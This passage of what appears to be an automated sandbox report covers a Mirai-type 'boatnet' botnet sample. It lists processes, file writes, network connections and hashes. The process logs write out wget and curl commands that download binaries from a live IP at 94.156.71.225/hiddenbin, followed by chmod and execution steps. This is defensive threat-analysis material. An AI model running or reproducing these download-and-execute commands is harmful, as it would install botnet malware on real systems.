| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x WTF boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/chmod
[chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian9-mipsbe-20240611-en
Max time kernel
60s
Max time network
64s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
59s
Max time network
64s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/496/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1265/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1586/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1606/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1597/status | /tmp/WTF | N/A |
| File opened for reading | /proc/174/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1596/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1042/status | /tmp/WTF | N/A |
| File opened for reading | /proc/426/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1555/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1184/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1566/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1055/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1305/status | /tmp/WTF | N/A |
| File opened for reading | /proc/550/status | /tmp/WTF | N/A |
| File opened for reading | /proc/568/status | /tmp/WTF | N/A |
| File opened for reading | /proc/11/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1116/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1526/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1666/status | /tmp/WTF | N/A |
| File opened for reading | /proc/31/status | /tmp/WTF | N/A |
| File opened for reading | /proc/137/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1305/status | /tmp/WTF | N/A |
| File opened for reading | /proc/21/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1614/status | /tmp/WTF | N/A |
| File opened for reading | /proc/13/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1079/status | /tmp/WTF | N/A |
| File opened for reading | /proc/467/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1653/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1599/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1526/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1585/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1623/status | /tmp/WTF | N/A |
| File opened for reading | /proc/497/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1083/status | /tmp/WTF | N/A |
| File opened for reading | /proc/465/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1604/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1660/status | /tmp/WTF | N/A |
| File opened for reading | /proc/659/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1132/status | /tmp/WTF | N/A |
| File opened for reading | /proc/20/status | /tmp/WTF | N/A |
| File opened for reading | /proc/15/status | /tmp/WTF | N/A |
